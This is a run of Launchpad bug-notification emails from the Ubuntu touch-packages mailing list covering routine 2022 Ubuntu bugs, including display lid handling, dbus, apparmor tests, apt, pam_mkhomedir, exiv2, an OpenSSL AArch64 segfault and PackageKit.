dmi.chassis.asset.tag: No Asset Information dmi.chassis.type: 10 dmi.chassis.vendor: LENOVO dmi.chassis.version: None dmi.ec.firmware.release: 1.9 dmi.modalias: dmi:bvnLENOVO:bvrN10ET30W(1.07):bd03/05/2015:br1.7:efr1.9:svnLENOVO:pn20CLS3JN0F:pvrThinkPadX250:rvnLENOVO:rn20CLS3JN0F:rvrSDK0E50510WIN:cvnLENOVO:ct10:cvrNone:skuLENOVO_MT_20CL_BU_Think_FM_ThinkPadX250: dmi.product.family: ThinkPad X250 dmi.product.name: 20CLS3JN0F dmi.product.sku: LENOVO_MT_20CL_BU_Think_FM_ThinkPad X250 dmi.product.version: ThinkPad X250 dmi.sys.vendor: LENOVO version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.109-2ubuntu1 version.libgl1-mesa-dri: libgl1-mesa-dri 21.2.2-1ubuntu1 version.libgl1-mesa-glx: libgl1-mesa-glx N/A version.xserver-xorg-core: xserver-xorg-core 2:1.20.14-1ubuntu1 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2build1 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20200714-1ubuntu2 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-1build1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-settings-daemon/+bug/1962276/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1962276] Re: [jammy] Laptop monitor does not turn off/disconnect when the lid is closed
This appears to be caused (for me at least) by upower 0.99.16-1 - after upgrading today to 0.99.16-2 things are working again as expected. ** Also affects: upower (Ubuntu) Importance: Undecided Status: New ** Bug watch added: Debian Bug tracker #1006368 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1006368 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to upower in Ubuntu. https://bugs.launchpad.net/bugs/1962276 Title: [jammy] Laptop monitor does not turn off/disconnect when the lid is closed Status in gnome-settings-daemon package in Ubuntu: New Status in linux package in Ubuntu: Confirmed Status in mutter package in Ubuntu: New Status in upower package in Ubuntu: New Bug description: After today's updates I can no longer run my Laptop in clam shell mode. I don't use a dock. I connect the second monitor via HDMI cable and and external keyboard/mouse via a USB hub. Usually I can just plugin the monitor and close the lid and the primary display will switch to the external monitor. Now it will default to Monitor 2 as part of the joint display. I also tested booting the machine and closing the lid but this still defaulted to the external monitor as the 2nd display. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: xorg 1:7.7+23ubuntu1 ProcVersionSignature: Ubuntu 5.15.0-18.18-generic 5.15.12 Uname: Linux 5.15.0-18-generic x86_64 ApportVersion: 2.20.11-0ubuntu78 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: pass CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Fri Feb 25 16:44:37 2022 DistUpgraded: Fresh install DistroCodename: jammy DistroVariant: ubuntu ExtraDebuggingInterest: Yes, if not too technical GraphicsCard: Intel Corporation HD Graphics 5500 [8086:1616] (rev 09) (prog-if 00 [VGA controller]) Subsystem: Lenovo HD Graphics 5500 [17aa:2226] InstallationDate: Installed on 2022-02-23 (1 days ago) InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Alpha amd64 (20220202) MachineType: LENOVO 20CLS3JN0F ProcEnviron: LANGUAGE=en_NZ:en PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_NZ.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-18-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 03/05/2015 dmi.bios.release: 1.7 dmi.bios.vendor: LENOVO dmi.bios.version: N10ET30W (1.07 ) dmi.board.asset.tag: Not Available dmi.board.name: 20CLS3JN0F dmi.board.vendor: LENOVO dmi.board.version: SDK0E50510 WIN dmi.chassis.asset.tag: No Asset Information dmi.chassis.type: 10 dmi.chassis.vendor: LENOVO dmi.chassis.version: None dmi.ec.firmware.release: 1.9 dmi.modalias: dmi:bvnLENOVO:bvrN10ET30W(1.07):bd03/05/2015:br1.7:efr1.9:svnLENOVO:pn20CLS3JN0F:pvrThinkPadX250:rvnLENOVO:rn20CLS3JN0F:rvrSDK0E50510WIN:cvnLENOVO:ct10:cvrNone:skuLENOVO_MT_20CL_BU_Think_FM_ThinkPadX250: dmi.product.family: ThinkPad X250 dmi.product.name: 20CLS3JN0F dmi.product.sku: LENOVO_MT_20CL_BU_Think_FM_ThinkPad X250 dmi.product.version: ThinkPad X250 dmi.sys.vendor: LENOVO version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.109-2ubuntu1 version.libgl1-mesa-dri: libgl1-mesa-dri 21.2.2-1ubuntu1 version.libgl1-mesa-glx: libgl1-mesa-glx N/A version.xserver-xorg-core: xserver-xorg-core 2:1.20.14-1ubuntu1 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2build1 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20200714-1ubuntu2 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-1build1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-settings-daemon/+bug/1962276/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1962036] Re: dbus was stopped during today's jammy update, breaking desktop
I hit this too - just reported https://bugs.launchpad.net/ubuntu/+source/gnome-shell/+bug/1962127 from the associated gnome-shell crash. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to dbus in Ubuntu. https://bugs.launchpad.net/bugs/1962036 Title: dbus was stopped during today's jammy update, breaking desktop Status in dbus package in Ubuntu: Confirmed Bug description: Impact: logind stopped, so desktop stopped, ssh stopped, got no getty. Had to hard reset. Today's jammy upgrade stopped dbus at 19:46:27 Feb 23 19:46:27 jak-t480s systemd[1]: Stopping D-Bus System Message Bus... This should not happen. I don't know which package caused this, but presumably dbus should not be stoppable in the first place. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: dbus 1.12.20-2ubuntu3 ProcVersionSignature: Ubuntu 5.15.0-22.22-generic 5.15.19 Uname: Linux 5.15.0-22-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu78 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: GNOME Date: Wed Feb 23 20:03:41 2022 InstallationDate: Installed on 2018-03-14 (1442 days ago) InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Alpha amd64 (20180313) RebootRequiredPkgs: Error: path contained symlinks. SourcePackage: dbus UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1962036/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1961196] Re: apparmor autotest failure on jammy with linux 5.15
Hmm so had to redo my merge after the 3.0.3-0ubuntu9 upload... see new bileto ticket/PPA for the current version of it https://bileto.ubuntu.com/#/ticket/4797 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1961196 Title: apparmor autotest failure on jammy with linux 5.15 Status in apparmor package in Ubuntu: New Status in apparmor source package in Jammy: New Bug description: [Impact] test-aa-notify is also checking if the output of `aa-notify --help` matches a specific text. However it looks like this output has changed in jammy so the autopkgtest is reporting errors like this: 05:17:31 ERROR| [stderr] === test-aa-notify.py === 05:17:31 ERROR| [stderr] .ssF. 05:17:31 ERROR| [stderr] == 05:17:31 ERROR| [stderr] FAIL: test_help_contents (__main__.AANotifyTest) 05:17:31 ERROR| [stderr] Test output of help text 05:17:31 ERROR| [stderr] -- 05:17:31 ERROR| [stderr] Traceback (most recent call last): 05:17:31 ERROR| [stderr] File "/tmp/testlibmse00lib/source/jammy/apparmor-3.0.3/utils/test/test-aa-notify.py", line 178, in test_help_contents 05:17:31 ERROR| [stderr] self.assertEqual(expected_output_is, output, result + output) 05:17:31 ERROR| [stderr] AssertionError: 'usag[189 chars]ptional arguments:\n -h, --helpsh[746 chars]de\n' != 'usag[189 chars]ptions:\n -h, --helpshow this hel[735 chars]de\n' 05:17:31 ERROR| [stderr] usage: aa-notify [-h] [-p] [--display DISPLAY] [-f FILE] [-l] [-s NUM] [-v] 05:17:31 ERROR| [stderr][-u USER] [-w NUM] [--debug] 05:17:31 ERROR| [stderr] 05:17:31 ERROR| [stderr] Display AppArmor notifications or messages for DENIED entries. 05:17:31 ERROR| [stderr] 05:17:31 ERROR| [stderr] - optional arguments: 05:17:31 ERROR| [stderr] + options: 05:17:31 ERROR| [stderr] -h, --helpshow this help message and exit 05:17:31 ERROR| [stderr] -p, --pollpoll AppArmor logs and display notifications 05:17:31 ERROR| [stderr] --display DISPLAY set the DISPLAY environment variable (might be needed if 05:17:31 ERROR| [stderr] sudo resets $DISPLAY) 05:17:31 ERROR| [stderr] -f FILE, --file FILE search FILE for AppArmor messages 05:17:31 ERROR| [stderr] -l, --since-last display stats since last login 05:17:31 ERROR| [stderr] -s NUM, --since-days NUM 05:17:31 ERROR| [stderr] show stats for last NUM days (can be used alone or with 05:17:31 ERROR| [stderr] -p) 05:17:31 ERROR| [stderr] -v, --verbose show messages with stats 05:17:31 ERROR| [stderr] -u USER, --user USER user to drop privileges to when not using sudo 05:17:31 ERROR| [stderr] -w NUM, --wait NUMwait NUM seconds before displaying notifications (with 05:17:31 ERROR| [stderr] -p) 05:17:31 ERROR| [stderr] --debug debug mode 05:17:31 ERROR| [stderr] : Got output "usage: aa-notify [-h] [-p] [--display DISPLAY] [-f FILE] [-l] [-s NUM] [-v] 05:17:31 ERROR| [stderr] [-u USER] [-w NUM] [--debug] [Test case] Simply run test-aa-notify.py from the autopkgtests. [Fix] Update the expected output returned by `aa-notify --help` in test-aa- notify.py. [Regression potential] This is just an autopkgtest, we may see regressions if the test is used with older version of apparmor-notify. With newer versions there's no risk of regressions. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1961196/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1961196] Re: apparmor autotest failure on jammy with linux 5.15
FYI I am preparing this in https://bileto.ubuntu.com/#/ticket/4796 - I have included the original patch from arighi to fix the aa-notify tests too. Once britney looks happy with this I will upload it to jammy- proposed. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1961196 Title: apparmor autotest failure on jammy with linux 5.15 Status in apparmor package in Ubuntu: New Status in apparmor source package in Jammy: New Bug description: [Impact] test-aa-notify is also checking if the output of `aa-notify --help` matches a specific text. However it looks like this output has changed in jammy so the autopkgtest is reporting errors like this: 05:17:31 ERROR| [stderr] === test-aa-notify.py === 05:17:31 ERROR| [stderr] .ssF. 05:17:31 ERROR| [stderr] == 05:17:31 ERROR| [stderr] FAIL: test_help_contents (__main__.AANotifyTest) 05:17:31 ERROR| [stderr] Test output of help text 05:17:31 ERROR| [stderr] -- 05:17:31 ERROR| [stderr] Traceback (most recent call last): 05:17:31 ERROR| [stderr] File "/tmp/testlibmse00lib/source/jammy/apparmor-3.0.3/utils/test/test-aa-notify.py", line 178, in test_help_contents 05:17:31 ERROR| [stderr] self.assertEqual(expected_output_is, output, result + output) 05:17:31 ERROR| [stderr] AssertionError: 'usag[189 chars]ptional arguments:\n -h, --helpsh[746 chars]de\n' != 'usag[189 chars]ptions:\n -h, --helpshow this hel[735 chars]de\n' 05:17:31 ERROR| [stderr] usage: aa-notify [-h] [-p] [--display DISPLAY] [-f FILE] [-l] [-s NUM] [-v] 05:17:31 ERROR| [stderr][-u USER] [-w NUM] [--debug] 05:17:31 ERROR| [stderr] 05:17:31 ERROR| [stderr] Display AppArmor notifications or messages for DENIED entries. 05:17:31 ERROR| [stderr] 05:17:31 ERROR| [stderr] - optional arguments: 05:17:31 ERROR| [stderr] + options: 05:17:31 ERROR| [stderr] -h, --helpshow this help message and exit 05:17:31 ERROR| [stderr] -p, --pollpoll AppArmor logs and display notifications 05:17:31 ERROR| [stderr] --display DISPLAY set the DISPLAY environment variable (might be needed if 05:17:31 ERROR| [stderr] sudo resets $DISPLAY) 05:17:31 ERROR| [stderr] -f FILE, --file FILE search FILE for AppArmor messages 05:17:31 ERROR| [stderr] -l, --since-last display stats since last login 05:17:31 ERROR| [stderr] -s NUM, --since-days NUM 05:17:31 ERROR| [stderr] show stats for last NUM days (can be used alone or with 05:17:31 ERROR| [stderr] -p) 05:17:31 ERROR| [stderr] -v, --verbose show messages with stats 05:17:31 ERROR| [stderr] -u USER, --user USER user to drop privileges to when not using sudo 05:17:31 ERROR| [stderr] -w NUM, --wait NUMwait NUM seconds before displaying notifications (with 05:17:31 ERROR| [stderr] -p) 05:17:31 ERROR| [stderr] --debug debug mode 05:17:31 ERROR| [stderr] : Got output "usage: aa-notify [-h] [-p] [--display DISPLAY] [-f FILE] [-l] [-s NUM] [-v] 05:17:31 ERROR| [stderr] [-u USER] [-w NUM] [--debug] [Test case] Simply run test-aa-notify.py from the autopkgtests. [Fix] Update the expected output returned by `aa-notify --help` in test-aa- notify.py. [Regression potential] This is just an autopkgtest, we may see regressions if the test is used with older version of apparmor-notify. With newer versions there's no risk of regressions. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1961196/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1961196] Re: apparmor autotest failure on jammy with linux 5.15
FYI I am working on merging apparmor-3.0.4 from debian unstable to jammy at the moment which should resolve this. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1961196 Title: apparmor autotest failure on jammy with linux 5.15 Status in apparmor package in Ubuntu: New Status in apparmor source package in Jammy: New Bug description: [Impact] test-aa-notify is also checking if the output of `aa-notify --help` matches a specific text. However it looks like this output has changed in jammy so the autopkgtest is reporting errors like this: 05:17:31 ERROR| [stderr] === test-aa-notify.py === 05:17:31 ERROR| [stderr] .ssF. 05:17:31 ERROR| [stderr] == 05:17:31 ERROR| [stderr] FAIL: test_help_contents (__main__.AANotifyTest) 05:17:31 ERROR| [stderr] Test output of help text 05:17:31 ERROR| [stderr] -- 05:17:31 ERROR| [stderr] Traceback (most recent call last): 05:17:31 ERROR| [stderr] File "/tmp/testlibmse00lib/source/jammy/apparmor-3.0.3/utils/test/test-aa-notify.py", line 178, in test_help_contents 05:17:31 ERROR| [stderr] self.assertEqual(expected_output_is, output, result + output) 05:17:31 ERROR| [stderr] AssertionError: 'usag[189 chars]ptional arguments:\n -h, --helpsh[746 chars]de\n' != 'usag[189 chars]ptions:\n -h, --helpshow this hel[735 chars]de\n' 05:17:31 ERROR| [stderr] usage: aa-notify [-h] [-p] [--display DISPLAY] [-f FILE] [-l] [-s NUM] [-v] 05:17:31 ERROR| [stderr][-u USER] [-w NUM] [--debug] 05:17:31 ERROR| [stderr] 05:17:31 ERROR| [stderr] Display AppArmor notifications or messages for DENIED entries. 05:17:31 ERROR| [stderr] 05:17:31 ERROR| [stderr] - optional arguments: 05:17:31 ERROR| [stderr] + options: 05:17:31 ERROR| [stderr] -h, --helpshow this help message and exit 05:17:31 ERROR| [stderr] -p, --pollpoll AppArmor logs and display notifications 05:17:31 ERROR| [stderr] --display DISPLAY set the DISPLAY environment variable (might be needed if 05:17:31 ERROR| [stderr] sudo resets $DISPLAY) 05:17:31 ERROR| [stderr] -f FILE, --file FILE search FILE for AppArmor messages 05:17:31 ERROR| [stderr] -l, --since-last display stats since last login 05:17:31 ERROR| [stderr] -s NUM, --since-days NUM 05:17:31 ERROR| [stderr] show stats for last NUM days (can be used alone or with 05:17:31 ERROR| [stderr] -p) 05:17:31 ERROR| [stderr] -v, --verbose show messages with stats 05:17:31 ERROR| [stderr] -u USER, --user USER user to drop privileges to when not using sudo 05:17:31 ERROR| [stderr] -w NUM, --wait NUMwait NUM seconds before displaying notifications (with 05:17:31 ERROR| [stderr] -p) 05:17:31 ERROR| [stderr] --debug debug mode 05:17:31 ERROR| [stderr] : Got output "usage: aa-notify [-h] [-p] [--display DISPLAY] [-f FILE] [-l] [-s NUM] [-v] 05:17:31 ERROR| [stderr] [-u USER] [-w NUM] [--debug] [Test case] Simply run test-aa-notify.py from the autopkgtests. [Fix] Update the expected output returned by `aa-notify --help` in test-aa- notify.py. [Regression potential] This is just an autopkgtest, we may see regressions if the test is used with older version of apparmor-notify. With newer versions there's no risk of regressions. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1961196/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1957781] Re: when i upgrade my package ask me yes or no ?
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find. ** Information type changed from Private Security to Public ** Package changed: ubuntu => apt (Ubuntu) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu. https://bugs.launchpad.net/bugs/1957781 Title: when i upgrade my package ask me yes or no ? Status in apt package in Ubuntu: New Bug description: ubuntu 21.10 use sudo apt upgrade toshiba@toshiba-Satellite-C850-B908:~$ sudo apt upgrade Reading package lists... Done Building dependency tree... Done Reading state information... Done Calculating upgrade... Done The following NEW packages will be installed: linux-headers-5.13.0-25 linux-headers-5.13.0-25-generic linux-image-5.13.0-25-generic linux-modules-5.13.0-25-generic linux-modules-extra-5.13.0-25-generic The following packages will be upgraded: ghostscript ghostscript-x gir1.2-javascriptcoregtk-4.0 gir1.2-webkit2-4.0 libexiv2-27 libfprint-2-2 libgs9 libgs9-common libjavascriptcoregtk-4.0-18 libnss-systemd libpam-systemd libqt5core5a libqt5dbus5 libqt5gui5 libqt5network5 libqt5widgets5 libsystemd0 libudev1 libwebkit2gtk-4.0-37 linux-generic-hwe-20.04 linux-headers-generic-hwe-20.04 linux-image-generic-hwe-20.04 linux-libc-dev openssh-client qt5-gtk-platformtheme systemd systemd-sysv systemd-timesyncd udev 29 upgraded, 5 newly installed, 0 to remove and 0 not upgraded. 27 standard security updates Need to get 148 MB of archives. After this operation, 504 MB of additional disk space will be used. Do you want to continue? [Y/n] 1 Get:1 http://sy.archive.ubuntu.com/ubuntu impish-updates/main amd64 systemd-timesyncd amd64 248.3-1ubuntu8.2 [30.8 kB] -- so i click 1 not y or yes ? and the upgrading begin? is that normal ? i mean using 1 as yes? To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1957781/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1957024] [NEW] pam-mkhomedir does not honor private home directories
Public bug reported: As reported in https://discourse.ubuntu.com/t/private-home-directories- for-ubuntu-21-04-onwards/19533/13: A common situation is to have a central set of users (e.g. in LDAP) and use pam_mkhomedir.so to create the home directory when the user first logs in. These changes do not cover this situation. The default configuration of pam_mkhomedir.so will result in a home directory created with 0755 permissions. To make pam_mkhomedir.so create a home directory by default with permissions consistent with the other tools then a umask argument can be added to the pam_mkhomedir.so module in the file /usr/share/pam- configs/mkhomedir. I believe this would have to be done before enabling the module. The file is part of the libpam-modules package. ** Affects: pam (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to pam in Ubuntu. https://bugs.launchpad.net/bugs/1957024 Title: pam-mkhomedir does not honor private home directories Status in pam package in Ubuntu: New Bug description: As reported in https://discourse.ubuntu.com/t/private-home- directories-for-ubuntu-21-04-onwards/19533/13: A common situation is to have a central set of users (e.g. in LDAP) and use pam_mkhomedir.so to create the home directory when the user first logs in. These changes do not cover this situation. The default configuration of pam_mkhomedir.so will result in a home directory created with 0755 permissions. To make pam_mkhomedir.so create a home directory by default with permissions consistent with the other tools then a umask argument can be added to the pam_mkhomedir.so module in the file /usr/share/pam- configs/mkhomedir. I believe this would have to be done before enabling the module. The file is part of the libpam-modules package. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pam/+bug/1957024/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1941752] Re: Regression: exiv2 0.27.3-3ubuntu1.5 makes Gwenview crash when opening images exported by darktable
@leosilva - as you did the original update for exiv2 could you please sponsor the attached debdiff? Thanks. ** Changed in: exiv2 (Ubuntu) Assignee: (unassigned) => Ubuntu Security Team (ubuntu-security) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to exiv2 in Ubuntu. https://bugs.launchpad.net/bugs/1941752 Title: Regression: exiv2 0.27.3-3ubuntu1.5 makes Gwenview crash when opening images exported by darktable Status in Gwenview: Fix Released Status in exiv2 package in Ubuntu: Confirmed Status in gwenview package in Ubuntu: Confirmed Bug description: Since the recent security update of exiv2, Gwenview crashes when trying to open image files that got exported by darktable. Steps to reproduce: * Make a test installation of Kubuntu 21.04 in VirtualBox * Install all updates * Install darktable * Copy one of the images in /usr/share/wallpapers (or any other image) to your home directory and open it with darktable * Within darktable, export a copy of the image (no need to do any actual modifications) * Try to open that copy with Gwenview. Gwenview will crash. I'm attaching a crash report hinting that this is related to exiv2. Temporary workaround: If I downgrade libexiv2-27 to 0.27.3-3ubuntu1.4, Gwenview doesn't crash, so it seems the crash is related to changes in 0.27.3-3ubuntu1.5. I don't know if the underlying cause is actually some bug in exiv2, Gwenview or darktable. Kind regards, Jan ProblemType: Bug DistroRelease: Ubuntu 21.04 Package: libexiv2-27 0.27.3-3ubuntu1.5 ProcVersionSignature: Ubuntu 5.11.0-31.33-generic 5.11.22 Uname: Linux 5.11.0-31-generic x86_64 ApportVersion: 2.20.11-0ubuntu65.1 Architecture: amd64 CasperMD5CheckResult: pass CurrentDesktop: KDE Date: Thu Aug 26 15:16:47 2021 InstallationDate: Installed on 2021-08-26 (0 days ago) InstallationMedia: Kubuntu 21.04 "Hirsute Hippo" - Release amd64 (20210420) SourcePackage: exiv2 UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/gwenview/+bug/1941752/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1953301] Re: Segfault on AArch64 caused by OpenSSL affecting numerous packages
FWIW I can't reproduce this on a RPi 4 running the aarch64/arm64 Ubuntu 20.04 LTS image: ubuntu@rpi4:~$ wget https://wrapdb.mesonbuild.com/v2/libuv_1.42.0-1/get_patch --2021-12-07 05:50:01-- https://wrapdb.mesonbuild.com/v2/libuv_1.42.0-1/get_patch Resolving wrapdb.mesonbuild.com (wrapdb.mesonbuild.com)... 138.201.247.118 Connecting to wrapdb.mesonbuild.com (wrapdb.mesonbuild.com)|138.201.247.118|:443... connected. HTTP request sent, awaiting response... 301 Moved Permanently Location: https://github.com/mesonbuild/wrapdb/releases/download/libuv_1.42.0-1/libuv_1.42.0-1_patch.zip [following] --2021-12-07 05:50:03-- https://github.com/mesonbuild/wrapdb/releases/download/libuv_1.42.0-1/libuv_1.42.0-1_patch.zip Resolving github.com (github.com)... 13.236.229.21 Connecting to github.com (github.com)|13.236.229.21|:443... connected. HTTP request sent, awaiting response... 302 Found Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/236250352/46c49bec-514b-4411-afe8-46ac8cb2e82f?X-Amz-Algorithm=AWS4-HMAC-SHA256=AKIAIWNJYAX4CSVEH53A%2F20211207%2Fus-east-1%2Fs3%2Faws4_request=20211207T054758Z=300=504c83b4d0c3567dc2f509362714a5b5709951655612c5665ca7d3e1f09050c5=host_id=0_id=0_id=236250352=attachment%3B%20filename%3Dlibuv_1.42.0-1_patch.zip=application%2Foctet-stream [following] --2021-12-07 05:50:03-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/236250352/46c49bec-514b-4411-afe8-46ac8cb2e82f?X-Amz-Algorithm=AWS4-HMAC-SHA256=AKIAIWNJYAX4CSVEH53A%2F20211207%2Fus-east-1%2Fs3%2Faws4_request=20211207T054758Z=300=504c83b4d0c3567dc2f509362714a5b5709951655612c5665ca7d3e1f09050c5=host_id=0_id=0_id=236250352=attachment%3B%20filename%3Dlibuv_1.42.0-1_patch.zip=application%2Foctet-stream Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.109.133, ... Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.110.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 5146 (5.0K) [application/octet-stream] Saving to: ‘get_patch’ get_patch 100%[=>] 5.03K --.-KB/sin 0.009s 2021-12-07 05:50:04 (590 KB/s) - ‘get_patch’ saved [5146/5146] ubuntu@rpi4:~$ dpkg -l openssl Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad) ||/ Name Version Architecture Description +++-==-=-- ii openssl1.1.1f-1ubuntu2.9 arm64Secure Sockets Layer toolkit - cryptographic utility ubuntu@rpi4:~$ uname -a Linux rpi4 5.4.0-1047-raspi #52-Ubuntu SMP PREEMPT Wed Nov 24 08:16:38 UTC 2021 aarch64 aarch64 aarch64 GNU/Linux Can you please provide more details on what hardware platform is being used in your case and what Ubuntu version / openssl version is in use? The meson github issue appears to mention Ubuntu 20.04 but some more details would be useful. ** Changed in: openssl (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1953301 Title: Segfault on AArch64 caused by OpenSSL affecting numerous packages Status in openssl package in Ubuntu: Incomplete Bug description: OpenSSL causes crashes when reaching to some URLs on AArch64 platform, affecting Ubuntu, but not Fedora for instance. Initially reported in https://mediasoup.discourse.group/t/mediasoup- worker-default-make-failed/3647/12, more details and reproductions in https://github.com/mesonbuild/meson/issues/9690 Affects curl, wget, python and probably everything else. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1953301/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1953301] Re: Segfault on AArch64 caused by OpenSSL affecting numerous packages
** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1953301 Title: Segfault on AArch64 caused by OpenSSL affecting numerous packages Status in openssl package in Ubuntu: New Bug description: OpenSSL causes crashes when reaching to some URLs on AArch64 platform, affecting Ubuntu, but not Fedora for instance. Initially reported in https://mediasoup.discourse.group/t/mediasoup- worker-default-make-failed/3647/12, more details and reproductions in https://github.com/mesonbuild/meson/issues/9690 Affects curl, wget, python and probably everything else. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1953301/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1953428] [NEW] /etc/PackageKit/Vendor.conf specifies invalid CodecUrl
Public bug reported: CodecUrl in /etc/PackageKit/Vendor.conf on Impish at least currently has: http://shop.canonical.com/index.php?cPath=19=f1e370ea7563ed5e654c10450364ff24 shop.canonical.com does not have a DNS record and has been dead for a long time so this should be removed. ** Affects: packagekit (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to packagekit in Ubuntu. https://bugs.launchpad.net/bugs/1953428 Title: /etc/PackageKit/Vendor.conf specifies invalid CodecUrl Status in packagekit package in Ubuntu: New Bug description: CodecUrl in /etc/PackageKit/Vendor.conf on Impish at least currently has: http://shop.canonical.com/index.php?cPath=19=f1e370ea7563ed5e654c10450364ff24 shop.canonical.com does not have a DNS record and has been dead for a long time so this should be removed. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/packagekit/+bug/1953428/+subscriptions -- Mailing list: 